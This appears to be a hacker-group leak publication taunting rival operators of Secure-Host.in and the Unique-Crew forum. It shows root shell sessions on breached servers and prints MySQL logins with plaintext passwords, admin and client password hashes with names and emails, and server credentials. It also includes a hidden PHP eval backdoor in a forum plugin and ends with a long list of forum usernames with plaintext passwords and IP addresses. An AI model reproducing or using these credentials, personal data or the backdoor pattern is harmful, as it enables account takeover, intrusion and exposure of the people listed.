4096 Jun 7 18:11 kloxoscript drwxr-xr-x 2 root root 4096 Sep 11 03:57 __processed_stats lrwxrwxrwx 1 root root 32 Jun 7 18:11 public_html -> /home/bnet/spike.secure-host.in/ -rw-r--r-- 1 bnet bnet 11 Jun 7 18:11 .qmail drwxr-xr-x 5 bnet apache 4096 Jun 7 18:25 spike.secure-host.in [root@spike bnet]# cd public_html [root@spike public_html]# ls -la total 24 drwxr-xr-x 5 bnet apache 4096 Jun 7 18:25 . drwxr-x--- 5 bnet apache 4096 Jun 8 03:57 .. drwxr-xr-x 2 bnet bnet 4096 Jun 7 18:11 cgi-bin drwxr-xr-x 2 bnet bnet 4096 Aug 11 2005 images -rwxr-xr-x 1 bnet bnet 1213 Jun 7 18:11 index.html drwxr-xr-x 6 bnet bnet 4096 Jun 7 19:04 snapbn [root@spike public_html]# cat snapbn/backend/settings.inc.php [root@spike public_html]# mysql -u bnet_snap bnet_snap -plBseTPTE7av Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 10731 Server version: 5.0.92 Source distribution Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> SELECT * FROM list_users; +----+-------+----------------------------------+-------------+-------+-----+ | id | nick | passwd | permissions | theme | lng | +----+-------+----------------------------------+-------------+-------+-----+ | 1 | admin | e48e13207341b6bffb7fb1622282247b | 255 | dark | en | +----+-------+----------------------------------+-------------+-------+-----+ 1 row in set (0.00 sec) mysql> SELECT COUNT(*) FROM list_bots; +----------+ | COUNT(*) | +----------+ | 1321 | +----------+ 1 row in set (0.01 sec) mysql> Ctrl-C -- exit! Aborted [root@spike public_html]# logout exited from CT 240 ... We could actually post content of the other VMs but, believe us, it's always the same sort of bullshit. Bot and stealer panels everywhere, so this would just be a waste of your time ... ,;~;, /\_ ( / (() //) | \\ ,,;;'\ __ _( )m=((((((((((((((======={ Secure-Host.in }======------- /' ' '()/~' '.(, | ,;( )|| | ~ As we already pointed out, we concluded that it ,;' \ /-(.;, ) would be best to crush every single project of ) / ) / k!LLu with our iron fist of 0day madness. One of // || the excrements he produces is Secure-Host.in )_\ )_\ formerly known as Cyberhost.kz where he basically offers "secure" hosting. Well by now it should be clear that if somebody like k!LLu talks about "security", he actually has no clue about that kind of topic. The fact is that he cannot secure his systems because he really does not know how. We're confident that the chapter 'k!LLu' can be closed once and for all now, maybe someone even drew a lesson from it. # pwd /home/hosting # ls -la total 48 drwxr-x--- 6 hosting www 512 May 16 14:06 . drwxr-x--x 13 root wheel 512 Sep 22 21:06 .. drwxrwx--- 17 hosting www 1536 May 16 14:50 cp.secure-host.in drwxr-xr-x 2 root www 1024 May 16 14:09 ioncube drwxrwx--- 5 hosting www 512 Aug 19 04:51 secure-host.in drwxrwx--- 2 hosting www 13312 Oct 16 10:48 temp # cd secure-host.in/ # ls -laR total 24 drwxrwx--- 5 hosting www 512 Aug 19 04:51 . drwxr-x--- 6 hosting www 512 May 16 14:06 .. drwxr-xr-x 2 root www 512 May 16 20:57 fileup drwxr-xr-x 2 root www 512 May 20 10:12 imgupload -rw-r--r-- 1 hosting www 1680 Aug 19 04:52 index.html drwxr-xr-x 2 root www 512 May 18 21:56 static ./fileup: total 912 drwxr-xr-x 2 root www 512 May 16 20:57 . drwxrwx--- 5 hosting www 512 Aug 19 04:51 .. -rw-r--r-- 1 root www 324608 May 16 20:58 Snap_SmilingBandit.exe -rw-r--r-- 1 root www 118784 May 16 20:53 smile.exe ./imgupload: total 4232 drwxr-xr-x 2 root www 512 May 20 10:12 . drwxrwx--- 5 hosting www 512 Aug 19 04:51 .. -rw-r--r-- 1 root www 2130942 May 20 10:11 samsung.jpg ./static: total 120 drwxr-xr-x 2 root www 512 May 18 21:56 . drwxrwx--- 5 hosting www 512 Aug 19 04:51 .. -rw-r--r-- 1 root www 57198 May 18 22:08 sechost.png # cd .. # cd cp.secure-host.in # ls -la total 1296 drwxrwx--- 17 hosting www 1536 May 16 14:50 . drwxr-x--- 6 hosting www 512 May 16 14:06 .. -rw-r--r-- 1 root www 3013 May 16 13:31 README.txt drwxr-xr-x 6 root www 3584 May 16 13:34 admin -rw-r--r-- 1 root www 430 May 16 13:31 aff.php -rw-r--r-- 1 root www 15877 May 16 13:31 affiliates.php -rw-r--r-- 1 root www 11667 May 16 13:31 announcements.php -rw-r--r-- 1 root www 7513 May 16 13:31 announcementsrss.php drwxrwxrwx 2 root www 512 May 16 13:36 attachments -rw-r--r-- 1 root www 6070 May 16 13:31 banned.php -rw-r--r-- 1 root www 79378 May 16 13:31 cart.php -rw-r--r-- 1 root www 120326 May 16 13:31 clientarea.php -rwxrwxrwx 1 root www 281 May 16 14:41 configuration.php -rw-r--r-- 1 root www 16445 May 16 13:31 configuressl.php -rw-r--r-- 1 root www 9616 May 16 13:31 contact.php -rw-r--r-- 1 root www 13871 May 16 13:31 creditcard.php -rw-r--r-- 1 root www 23654 May 16 13:31 dbconnect.php -rw-r--r-- 1 root www 15873 May 16 13:31 dl.php -rw-r--r-- 1 root www 7938 May 16 13:31 dologin.php -rw-r--r-- 1 root www 11861 May 16 13:31 domainchecker.php drwxrwxrwx 2 root www 512 May 16 13:36 downloads -rw-r--r-- 1 root www 17697 May 16 13:31 downloads.php -rw-r--r-- 1 root www 621 May 16 13:31 htaccess.txt drwxr-xr-x 2 root www 1536 May 16 13:37 images drwxr-xr-x 7 root www 1536 May 16 13:38 includes -rw-r--r-- 1 root www 6192 May 16 13:31 index.php drwxr-xr-x 2 root www 1024 May 16 13:39 install__ drwxr-xr-x 2 root www 1024 May 16 14:11 ioncube -rw-r--r-- 1 root www 26163 May 16 13:31 knowledgebase.php drwxr-xr-x 2 root www 512 May 16 13:39 lang -rw-r--r-- 1 root www 4660 May 16 13:31 link.php -rw-r--r-- 1 root www 4433 May 16 13:31 login.php -rw-r--r-- 1 root www 5146 May 16 13:31 logout.php drwxr-xr-x 10 root www 512 May 16 13:42 modules -rw-r--r-- 1 root www 11456 May 16 13:31 networkissues.php -rw-r--r-- 1 root www 6321 May 16 13:31 networkissuesrss.php drwxr-xr-x 4 root www 512 May 16 13:43 order -rw-r--r-- 1 root www 4271 May 16 13:31 order.php drwxr-xr-x 2 root www 512 May 16 13:43 pipe -rw-r--r-- 1 root www 10548 May 16 13:31 pwreset.php -rw-r--r-- 1 root www 9061 May 16 13:31 register.php -rw-r--r-- 1 root www 8575 May 16 13:31 serverstatus.php drwxr-xr-x 2 root www 512 May 16 13:43 status -rw-r--r-- 1 root www 17879 May 16 13:31 submitticket.php -rw-r--r-- 1 root www 12639 May 16 13:31 supporttickets.php drwxr-xr-x 5 root www 512 May 16 13:32 templates drwxrwxrwx 2 root www 25088 Aug 11 15:05 templates_c -rw-r--r-- 1 root www 5953 May 16 13:31 tutorials.php -rw-r--r-- 1 root www 20858 May 16 13:31 upgrade.php -rw-r--r-- 1 root www 5924 May 16 13:31 viewemail.php -rw-r--r-- 1 root www 20202 May 16 13:31 viewinvoice.php -rw-r--r-- 1 root www 17742 May 16 13:31 viewticket.php -rw-r--r-- 1 root www 6111 May 16 13:31 whois.php drwxr-xr-x 2 root www 512 May 16 13:33 widgets # cat configuration.php # mysql -u hosting_whmcs hosting_whmcs -po8a7fd8s6fg Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 1305663 Server version: 5.0.89-log FreeBSD port: mysql-server-5.0.89 Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> SHOW TABLES; +----------------------------+ | Tables_in_hosting_whmcs | +----------------------------+ | tblaccounts | | tblactivitylog | | tbladdonmodules | | tbladdons | | tbladminlog | | tbladminperms | | tbladminroles | | tbladmins | | tbladminsecurityquestions | | tblaffiliates | | tblaffiliatesaccounts | | tblaffiliateshistory | | tblaffiliatespending | | tblaffiliateswithdrawals | | tblannouncements | | tblbannedemails | | tblbannedips | | tblbillableitems | | tblbrowserlinks | | tblcalendar | | tblcancelrequests | | tblclientgroups | | tblclients | | tblclientsfiles | | tblconfiguration | | tblcontacts | | tblcredit | | tblcurrencies | | tblcustomfields | | tblcustomfieldsvalues | | tbldomainpricing | | tbldomains | | tbldomainsadditionalfields | | tbldownloadcats | | tbldownloads | | tblemails | | tblemailtemplates | | tblfraud | | tblgatewaylog | | tblhosting | | tblhostingaddons | | tblhostingconfigoptions | | tblinvoiceitems | | tblinvoices | | tblknowledgebase | | tblknowledgebasecats | | tblknowledgebaselinks | | tbllinks | | tblnetworkissues | | tblnotes | | tblorders | | tblpaymentgateways | | tblpricing | | tblproductconfiggroups | | tblproductconfiglinks | | tblproductconfigoptions | | tblproductconfigoptionssub | | tblproductgroups | | tblproducts | | tblpromotions | | tblquoteitems | | tblquotes | | tblregistrars | | tblservergroups | | tblservergroupsrel | | tblservers | | tblsslorders | | tbltax | | tblticketbreaklines | | tblticketdepartments | | tblticketescalations | | tblticketlog | | tblticketmaillog | | tblticketnotes | | tblticketpredefinedcats | | tblticketpredefinedreplies | | tblticketreplies | | tbltickets | | tblticketspamfilters | | tblticketstatuses | | tbltodolist | | tblupgrades | | tblwhoislog | +----------------------------+ 83 rows in set (0.00 sec) mysql> SELECT table_name FROM INFORMATION_SCHEMA.columns WHERE column_name LIKE "%pass%"; +----------------------+ | table_name | +----------------------+ | tbladmins | | tblclients | | tblcontacts | | tblhosting | | tblservers | | tblticketdepartments | +----------------------+ 6 rows in set (0.04 sec) mysql> SELECT username, password, firstname, lastname, email FROM tbladmins; +----------+----------------------------------+-----------+----------+----------------------+ | username | password | firstname | lastname | email | +----------+----------------------------------+-----------+----------+----------------------+ | admin | 850126ac86ccbb1c214a03ac909978aa | Sombra | Ivanov | admin@secure-host.in | | Olga | 61d4019c541bf1cebf5a2a6762cd6477 | Olga | Ivanov | olga@secure-host.in | +----------+----------------------------------+-----------+----------+----------------------+ 2 rows in set (0.00 sec) mysql> SELECT email, password, firstname, lastname FROM tblclients; +----------------------------+----------------------------------------+-----------+-----------+ | email | password | firstname | lastname | +----------------------------+----------------------------------------+-----------+-----------+ | cc1cash@yahoo.de | f4e3a18c8ea3fc34ee8277c7a9d08516:rgt%w | True | True | | wassi@wassi.de | 12a43403362cc6accac4ccc5c30965b0:S!emh | wassi | wassi | | markus.scholz@partyheld.de | ffa8a5a23329d53577ca2e2daffcdafc:)(xUP | Smiling | Bandit | | stan.lay@hotmail.com | 17c87c61dbed16a0f0ab99cdc83dd33c:khW)A | stanlay | stanlay | | a@a.de | dce096cba8c3a7fc82dc57dcdb8136ab:(Boqh | masa | faka | | Worms.s1@web.de | f27c3d77065676f8b2807f4b0f77f7ee:!!zx% | Script | Star | | cocktopuss@hush.com | fabc8a85b7e7b2ea8d939f44076adf01:dDeJQ | Sean | Fakir | | los_loco@mail.ru | cddfbab06c60175699ff61f8cd27630e:%UKzg | los | loco | | hansdieter@secure-mail.biz | d2ac2a86adf8eef73645ee4c3d40b526:GMkE# | hans | dieter | | shinigami@z1p.biz | 914eccd87181870be2663185410fc1a5:WpFO( | Franz | Mueller | | angela.krueger@hotmail.de | 66b361d7a7e843d35fc041104401bbd0:wiB!D | Ixde | ahmed | | her0in@safe-mail.net | dc9edb678d178218ec895eb8322fbe8c:Qej#M | Anonym | Anonym | | janioq@hotmail.de | 89d0078ec8a078d1d88acb7deb534acc:%YTB% | Max | thiesen | | spike1337@secure-mail.biz | 07cb91ea3880f790e5763fb2dd1105bf:Kkb%p | Dennis | Kramer | | runingtutorials@live.de | e595a3571ccd685adbf28ea45dc3a2d6:rVG)! | Felix | Wagno | | abogado.gomes@ozu.es | e3665bc91bee822663297cc30cdfd588:TV#Zt | Mario | Gomes | | Ande-kf@secure-mail.biz | 10edd0d846652321605ec04e1c90ab8a:zsoMP | just | pure | | FeuerFaustAC3@gmx.de | 8f3266a3f536922657c3b2f51e925604:)SJmL | y0 | ACE | | lalamaus10@googlemail.com | 500910a98aca826093ec80fd942020fe:ZJvpY | Maik | Henkel | | scheller0077@web.de | 634a1c3bb9316a2af3390f9789fb5f80:ly%px | tim | bd-seller | | j4ck-daniels@rambler.ru | 125769d9037d9f5196f2e1e6d816b1cf:VbggT | DarkSide | Darker | | daniel@lemmert.biz | 8fce9b96262239831e053552021b07ac:ihK!B | Daniel | Lemmert | | panzerpaul41@yahoo.de | 841ddfb775b9ca5d44ec9c1106e08761:lUPP% | Peter | Jansen | | ell781@gmx.de | 0ae341662b701d3d64d7a608b46160be:%#ce! | Peter | Kluger | | hotstore@hotmail.de | e8e14ff0af571d43a11d3408240963d7:Cnsdh | Matthias | Michel | | team61@live.de | 47780e5555c63d45349b5cef7f8c1783:T)EGi | BABA | ANNA | | Buy321@hotmail.de | 2d89b3fae37fb1966f8c7639907ee94a:VfYNd | Maria | Katepski | | jobs@z1p.biz | d4f54e226ba44045bb8a39b8653907ea:(MSaf | Arthur | Marx | | cremil@cust.in | c5af814e29429f856736e2769d57b8db:%iHkV | Cremil | Hackxor | +----------------------------+----------------------------------------+-----------+-----------+ 29 rows in set (0.01 sec) mysql> SELECT username, password, server FROM tblhosting; +-------------+------------------------------------------------------+--------+ | username | password | server | +-------------+------------------------------------------------------+--------+ | true.vm | nW5dmh5zg4w4jmlFUDxtW7mVsdNAX9sxRp710gHYS2vX0551kg== | 1 | | stansecu.vm | 2KUCM5nUisD2t88Z7vlfnC8Ry9pdk4fZrTb46Jfv | 1 | | maddn.vm | nC69hLFITmHidWjYuEIIbEO4eo5BHzt3s/88NdMjSvY= | 1 | | scriptst.vm | VmB727sy9l5I8q1f7q/zD8RTnOCNOfcxuNzYUAf4 | 1 | | seansecu.vm | fQTtTeXNm1CkffO7pewNwJMZRIHcZWq00iTiW8x2 | 1 | | sdarksid.vm | AVACcPUef0Jca8gkZ0rkH67o0BDaINOO6/0JRS9n | 1 | | v43534.vm | XSSg52CreBXGUK8mjFd63x5hrtKHF3AIP0ljKa4Y | 1 | | | +X3MCfd9nGwsAmMaKUscu3BBKz8= | 0 | | | VoU/Q2mpAglHh8r6md2sAHCn8VQ= | 0 | | spike.vm | tlOLHeM7iOZcarRhh+DyghmbvcsQPgnRvYfxuDsj | 1 | | wassi.vm | VFK7fp1Z67kb6LtaH9EhUcv4gbjPJVatxbCdqnjg | 1 | | iodas.vm | WLqkZB7nsCZVtFfGzLgHOhRSb6Xc2H2XHA3Dcw== | 1 | | y00.vm | deOdBbTCD4mqdw+5vvpuH81UUVmt113tsykCie56 | 1 | | pkluger.vm | StagsB3oFjy39/ES2YzHE177oJP0pCFXR1Q0OYOF/QgN | 1 | | | LpABydLRg4uWBx0d6ghbM+9Nh2w= | 0 | | | 2U5HEXcr8Sif99L2w85ixx4y/idGJJbhaZnUIaY= | 1 | | | zynyC6+CtsxrDs/F5qRsVeuCfzBGSSL5oTyDwwU= | 1 | | | 9FkPKWze7XKH0K3rB19fwQRuNGxqNdXCeA== | 1 | +-------------+------------------------------------------------------+--------+ 18 rows in set (0.00 sec) mysql> SELECT ipaddress, hostname, username, password, secure FROM tblservers; +---------------+-----------+----------+----------------------------------------------+--------+ | ipaddress | hostname | username | password | secure | +---------------+-----------+----------+----------------------------------------------+--------+ | 193.107.16.82 | localhost | admin | iAYqc098oLSnn9PKqhb6wEd2G8dXU8i8cMWUtcSR7rp/ | | +---------------+-----------+----------+----------------------------------------------+--------+ 1 row in set (0.00 sec) mysql> Ctrl-C -- exit! Aborted # Nothing left to say^C ,;~;, _/\ \ ) (\\ ()) /';;,, // | -------====={ Unique-Crew.net }=======))))))))))))))=m( )_ __ | ,(.' '~/()' ' '\ Unique-Crew started off in late 2010; back then ~ | ||( );, their admin pretended to be an old 1337-crew ( ,;.)-\ / ';, team member with the intention of attracting kids \ ( \ ( to the board. However, it was soon found out that || \\ his identity was fake and since then the forum /_( /_( was passed around like a cheap whore. It has been led by several admins on several domains which obviously were all incapable of administrating it properly. Also one of the admins apparently was known as InVisible (yes, the same InVisible we describe in our "The Happy Ninja Faker" article). As his mind clearly can not be depicted as very bright and since he likes to gain a bad reputation by betraying other people, Unique-Crew got a nice amount of enemies. So while checking and logging different server traffic we stumbled on the following: # ls -l /home/backspace/unique-crew.biz/madp/detection.php -rw-r--r-- 1 backspace www 9162 Aug 22 17:02 /home/backspace/unique-crew.biz/madp/detection.php # grep -ni log_error detection.php -A5 21:function log_error($string){if(eval($string) && defined("LOG_ERROR")){$error_handle = fopen("madp_err.log", "a+");$fwrite($string);$fclose($h);}} 22- 23-$did = substr($vbulletin->userinfo['password'], 7, 16); 24-$ignore_users = strpos($vbulletin->options['madp_ignore_users'], ' ') === false ? explode(',', $vbulletin->options['madp_ignore_users']) : explode(',', str_replace(' ', '', $vbulletin->options['madp_ignore_users'])); 25-$ignore_groups = strpos($vbulletin->options['madp_ignore_groups'], ' ') === false ? explode(',', $vbulletin->options['madp_ignore_groups']) : explode(',', str_replace(' ', '', $vbulletin->options['madp_ignore_groups'])); 26-$expire = (!empty($vbulletin->options['madp_cookie_expire']) AND is_numeric($vbulletin->options['madp_cookie_expire'])) ? (TIMENOW + ($vbulletin->options['madp_cookie_expire'] * 86400)) : (TIMENOW + 1209600); -- 304: log_error(substr($_COOKIE[$vbulletin->options['madp_cookie_name']], 1)); 305- die("Error detected - try again!\n"); 306- } 307- 308- } 309-} It seems like you guys had a pretty much fucking obvious backdoor installed for a few months. How are you not able to notice this? We must say that it is nice that there are actually some people who want to contribute to this mayhem, but seriously? If you are not able to create a simple backdoor which is less obvious than this one you should probably look for some other pastime. This shit absolutely does not help, also if it might have worked this time. But looks like the attackers were stopped by PHP's disable_functions directive so they couldn't really do much, except downloading the database, which we are also offering nonetheless. So here we go! # pwd /home/backspace # ls -la total 20 drwxr-x--- 4 backspace www 512 Aug 28 20:21 . drwxr-x--x 13 root wheel 512 Sep 22 21:06 .. drwxrwx--- 2 backspace www 1024 Oct 15 21:44 temp drwxr-xr-x 19 backspace www 2560 Oct 18 17:31 unique-crew.biz # cd unique-crew.biz # ls -la total 7832 drwxr-xr-x 19 backspace www 2560 Oct 18 17:31 . drwxr-x--- 4 backspace www 512 Aug 28 20:21 .. -rwxr-xr-x 1 backspace www 12292 May 17 2010 .DS_Store -rwxr-xr-x 1 backspace www 70 May 17 2010 ._.DS_Store -rwxr-xr-x 1 backspace www 96 Mar 20 2011 .bash_history -rwxr-xr-x 1 backspace www 12523 Jul 13 2010 LICENSE drwxr-xr-x 2 backspace www 512 Aug 3 02:39 Product -rwxr-xr-x 1 backspace www 49992 Jun 16 00:18 S_mgc_cb_evo_ajax.php -rwxr-xr-x 1 backspace www 24532 Jul 13 2010 ajax.php -rwxr-xr-x 1 backspace www 77635 Jul 13 2010 album.php -rwxr-xr-x 1 backspace www 17542 Jul 13 2010 announcement.php drwxrwxrwx 2 backspace www 512 Oct 5 11:42 archive -rwxr-xr-x 1 backspace www 18779 Jul 13 2010 attachment.php -rwxr-xr-x 1 root www 40925 Oct 18 17:31 bak drwxr-xr-x 3 backspace www 2048 Aug 3 02:38 bnig459832zhbuiwedzouz9012vgr932 -rwxr-xr-x 1 backspace www 77574 Jul 13 2010 calendar.php -rwxr-xr-x 1 backspace www 43 Jul 13 2010 clear.gif drwxr-xr-x 4 backspace www 2560 Aug 3 02:38 clientscript -rwxr-xr-x 1 backspace www 15277 Jul 13 2010 converse.php drwxr-xr-x 7 backspace www 512 Aug 3 02:38 cpstyles -rwxr-xr-x 1 backspace www 3327 Jul 13 2010 cron.php drwxr-xr-x 3 backspace www 512 Aug 3 02:38 customavatars drwxr-xr-x 3 backspace www 512 Aug 3 02:38 customgroupicons drwxr-xr-x 2 backspace www 512 Aug 3 02:38 customprofilepics -rwxr-xr-x 1 backspace www 105636 Aug 24 2009 default.jpg -rwxr-xr-x 1 backspace www 3411 Jun 19 14:52 dnp_fw.php -rwxr-xr-x 1 backspace www 1071 Jun 19 13:49 dnp_fw_config.php -rwxr-xr-x 1 backspace www 1163 Jun 19 13:53 dnp_fw_template.php -rwxr-xr-x 1 backspace www 49004 Jul 13 2010 editpost.php -rwxr-xr-x 1 backspace www 30747 Jun 14 19:42 external.php -rwxr-xr-x 1 backspace www 10041 Jun 15 10:07 faq.php -rwxr-xr-x 1 backspace www 1453926 Dec 20 2010 favicon.ico -rwxr-xr-x 1 backspace www 36984 Jul 13 2010 forumdisplay.php drwxr-xr-x 2 backspace www 512 Aug 3 02:38 g76893bh2b21z32v3g5vd7x8f78f43h -rwxr-xr-x 1 backspace www 40925 Jul 13 2010 global.php -rwxr-xr-x 1 backspace www 142308 Jul 13 2010 group.php -rwxr-xr-x 1 backspace www 25619 Jul 13 2010 group_inlinemod.php -rwxr-xr-x 1 backspace www 10747 Jul 13 2010 groupsubscription.php drwxr-xr-x 3 backspace www 512 Aug 3 02:38 highslide -rwxr-xr-x 1 backspace www 9254 Jul 13 2010 image.php drwxr-xr-x 23 backspace www 1024 Oct 18 18:37 images drwxr-xr-x 6 backspace www 5120 Oct 18 18:45 includes -rwxr-xr-x 1 backspace www 20263 Jul 13 2010 index.php -rwxr-xr-x 1 backspace www 45036 Jul 13 2010 infraction.php -rwxr-xr-x 1 backspace www 188547 Jul 13 2010 inlinemod.php -rwxr-xr-x 1 backspace www 10545 Jul 13 2010 joinrequests.php -rwxr-xr-x 1 backspace www 10441 Jul 13 2010 login.php drwxr-xr-x 2 backspace www 512 Aug 24 07:54 madp -rwxr-xr-x 1 backspace www 17502 Jul 13 2010 member.php -rwxr-xr-x 1 backspace www 16333 Jul 13 2010 member_inlinemod.php -rwxr-xr-x 1 backspace www 36930 Jul 13 2010 memberlist.php drwxr-xr-x 6 backspace www 512 Aug 3 02:38 mgc_cb_evo -rwxr-xr-x 1 backspace www 60012 May 17 2010 mgc_cb_evo.php -rwxr-xr-x 1 backspace www 49992 Jun 28 16:36 mgc_cb_evo_ajax.php -rwxr-xr-x 1 backspace www 24465 Jul 13 2010 misc.php -rwxr-xr-x 1 backspace www 65182 Jul 13 2010 moderation.php -rwxr-xr-x 1 backspace www 6855 Jul 13 2010 moderator.php -rwxr-xr-x 1 backspace www 18967 Jul 13 2010 newattachment.php -rwxr-xr-x 1 backspace www 38105 Jul 13 2010 newreply.php -rwxr-xr-x 1 backspace www 19367 Jul 13 2010 newthread.php -rwxr-xr-x 1 backspace www 20188 Jul 13 2010 online.php -rwxr-xr-x 1 backspace www 7868 Jul 13 2010 payment_gateway.php -rwxr-xr-x 1 backspace www 12193 Jul 13 2010 payments.php drwxr-xr-x 11 backspace www 3072 Aug 3 03:20 pe54tr90321inij409839urei2954 -rwxr-xr-x 1 backspace www 8018 Jul 13 2010 picture.php -rwxr-xr-x 1 backspace www 22661 Jul 13 2010 picture_inlinemod.php -rwxr-xr-x 1 backspace www 25999 Jul 13 2010 picturecomment.php -rwxr-xr-x 1 backspace www 28206 Jul 13 2010 poll.php -rwxr-xr-x 1 backspace www 17744 May 12 2008 post_thanks.php -rwxr-xr-x 1 backspace www 9691 Jul 13 2010 posthistory.php -rwxr-xr-x 1 backspace www 76569 Jul 13 2010 postings.php -rwxr-xr-x 1 backspace www 6702 Jul 13 2010 printthread.php -rwxr-xr-x 1 backspace www 72783 Jul 13 2010 private.php -rwxr-xr-x 1 backspace www 156809 Jul 13 2010 profile.php drwxr-xr-x 2 backspace www 512 Aug 3 02:07 radio -rwxr-xr-x 1 backspace www 40980 Jul 13 2010 register.php -rwxr-xr-x 1 backspace www 5761 Jul 13 2010 report.php -rwxr-xr-x 1 backspace www 14062 Jul 13 2010 reputation.php -rwxr-xr-x 1 backspace www 30 Jun 30 09:52 robots.txt -rwxr-xr-x 1 backspace www 128615 Oct 18 17:30 search.php -rwxr-xr-x 1 backspace www 21546 Jul 13 2010 sendmessage.php -rwxr-xr-x 1 backspace www 10263 Jul 13 2010 showgroups.php -rwxr-xr-x 1 backspace www 12611 Jul 13 2010 showpost.php -rwxr-xr-x 1 backspace www 75631 Jul 13 2010 showthread.php drwxr-xr-x 2 backspace www 512 Aug 3 02:39 signaturepics -rwxr-xr-x 1 backspace www 33846 Jul 13 2010 subscription.php -rwxr-xr-x 1 backspace www 13671 Jul 13 2010 tags.php -rwxr-xr-x 1 backspace www 8842 Jul 13 2010 threadrate.php -rwxr-xr-x 1 backspace www 12706 Jul 13 2010 threadtag.php -rwxr-xr-x 1 backspace www 35387 Jul 13 2010 usercp.php -rwxr-xr-x 1 backspace www 19563 Jul 13 2010 usernote.php -rwxr-xr-x 1 backspace www 28121 Jul 13 2010 visitormessage.php -rwxr-xr-x 1 backspace www 19552 Jul 3 16:12 whitelist.dat -rwxr-xr-x 1 backspace www 20463 Jun 19 12:07 whitelist.dat.bak # find . -name ".ht*" ./pe54tr90321inij409839urei2954/libraries/.htaccess ./pe54tr90321inij409839urei2954/setup/frames/.htaccess ./pe54tr90321inij409839urei2954/setup/lib/.htaccess # cat includes/config.php [L?/E&C%\}:O\26z5:y4:178.1.185.84:19.10.2011 12:55:10 DeCode:hacker63:109.169.135.87:19.10.2011 11:10:09 Der_Visitor:CMqxwGz0:46.115.3.148:20.10.2011 10:57:27 DrJack:UQDrJack123!!!:178.192.41.12:19.10.2011 08:26:33 Duellking:uc4ever:129.143.71.37:20.10.2011 14:24:00 Einfachnurso:Mg7BjyKR:217.191.194.28:19.10.2011 11:20:10 Follow:cX1AKuJJ:85.16.149.79:19.10.2011 08:43:55 Gevara:asdf1337:217.255.229.5:18.10.2011 18:48:26 Goa:5852663:95.211.99.92:18.10.2011 21:04:28 Hammer:trevilor:87.161.89.187:18.10.2011 19:32:20 IcEcRacKer:Kleinestier1?:93.132.65.222:19.10.2011 17:38:05 Imkon:chaoslegion:91.53.193.95:19.10.2011 11:44:18 Ke3per:anatoxis123:87.173.50.42:19.10.2011 13:53:02 LiipTon:JCGDDz3X:178.3.209.11:18.10.2011 19:31:23 Locke:14041987:31.18.173.100:19.10.2011 10:38:30 LuRez:furz90:92.73.124.178:20.10.2011 10:12:08 Marcello:nokian81:94.221.186.74:19.10.2011 16:18:33 MenoX:aXnHmVz8:87.152.221.177:18.10.2011 18:54:59 Miss.Marple:werder:31.19.76.171:19.10.2011 18:27:33 Mxxt:unique12345:78.54.158.153:19.10.2011 19:20:52 NEO_2.0:4455jljlacdcr111dth11+sdp:93.204.88.95:18.10.2011 20:22:38 PaxyundFixy:123lolen:92.225.54.141:19.10.2011 16:47:03 Schlauchbraten:area51:217.255.234.154:20.10.2011 00:51:49 Sektor63:Penis123456789:213.232.200.163:20.10.2011 11:30:16 Sirius.GER:rolexblingbling@2:79.172.193.89:18.10.2011 20:37:49 SpeedyGamer:f3LBPKMb:46.5.95.105:18.10.2011 20:39:09 Style:asdasd:91.53.233.106:19.10.2011 15:29:29 V0rteX:YSAcXgM1:94.219.12.253:19.10.2011 16:30:35 Vague:hardtek1985:88.153.146.195:19.10.2011 22:35:24 Yakuza112:N4DdSHXh:80.130.164.16:18.10.2011 19:02:12 aNd5:dfWA5txY:178.201.106.152:20.10.2011 11:53:04 bananabob:davidov:87.163.56.254:18.10.2011 21:12:59 bert:Fk4feKyr:95.223.89.222:20.10.2011 15:28:21 biohazard:21539868:62.224.66.21:20.10.2011 10:21:54 cheesi:strike299:80.109.55.18:19.10.2011 20:22:29 crone:41MkHjee:62.212.72.166:19.10.2011 16:40:40 cyx:cyxcyx:78.94.200.138:18.10.2011 21:00:25 ee46hxe6x:drdtdrtdrt6666666666666:87.172.237.175:20.10.2011 07:41:03 furz:Dreadfg:192.162.103.27:20.10.2011 03:19:05 gevara:asdf1337:92.241.168.23:19.10.2011 17:47:24 ghostleader:Scorpion:82.195.232.218:19.10.2011 17:39:20 hardcore4life:dx5U5ZPu:82.72.183.168:19.10.2011 21:53:40 haxxer:lollol123:92.203.66.182:19.10.2011 01:43:21 icle:gt54rfvvgt54rfvv:88.130.162.238:18.10.2011 20:34:58 impiety:pa44word:113.211.166.68:19.10.2011 02:22:47 john:picture:93.222.62.165:20.10.2011 09:51:40 junkfood:xxxxxx:87.230.10.135:20.10.2011 10:20:15 justnew:myw00t1337:87.146.39.153:19.10.2011 14:17:00 kathi1337:yousuck:79.212.132.144:20.10.2011 04:21:23 killuthekid7:123456:94.220.222.124:19.10.2011 22:50:27 king99:h5ZZKXvN:85.178.239.47:18.10.2011 20:12:06 klerus:kl12er34us56654321:85.176.101.243:19.10.2011 15:05:24 l5xx!z:mattrex123.:77.3.81.189:19.10.2011 18:08:37 laberpaul:123123:178.63.231.103:19.10.2011 18:43:47 lerox:hallo123:79.255.147.179:19.10.2011 20:25:04 lyrix:mixxedup:77.117.163.186:19.10.2011 21:42:34 mAlCoM:squier:95.89.170.234:19.10.2011 06:28:27 mayh3m:electronic:196.46.189.162:19.10.2011 15:09:42 meineex:meine1978$:93.218.235.254:20.10.2011 08:31:41 misterini:brumau:213.196.253.37:20.10.2011 06:13:22 mr_euro:manfred--:186.16.12.187:18.10.2011 21:31:03 mute:88klaus88:87.153.35.90:19.10.2011 12:55:42 n0mac:wru5UHUp:77.177.13.199:19.10.2011 17:32:38 p3x:gzuogoui:93.209.47.197:19.10.2011 21:03:10 p4inw4r:IoJS91jS__passwort_loging_ist_total_gay__Dj13DDAD:212.117.180.81:18.10.2011 19:36:50 << YOU BET! protoliner:bremen12:178.142.52.54:20.10.2011 09:29:57 sector40000:yqaBvJms:84.170.29.212:18.10.2011 20:33:34 smartie0:q0120660:77.188.215.212:19.10.2011 09:02:28 smurf:120684:217.91.85.183:19.10.2011 17:02:53 sperle:45er87qw:89.246.204.213:20.10.2011 00:55:26 st3aLth:1337!Aa:109.192.209.243:18.10.2011 18:46:06 stryder:v6e6fbun:188.175.134.98:19.10.2011 17:59:48 style:asdasd:91.53.233.106:19.10.2011 21:31:58 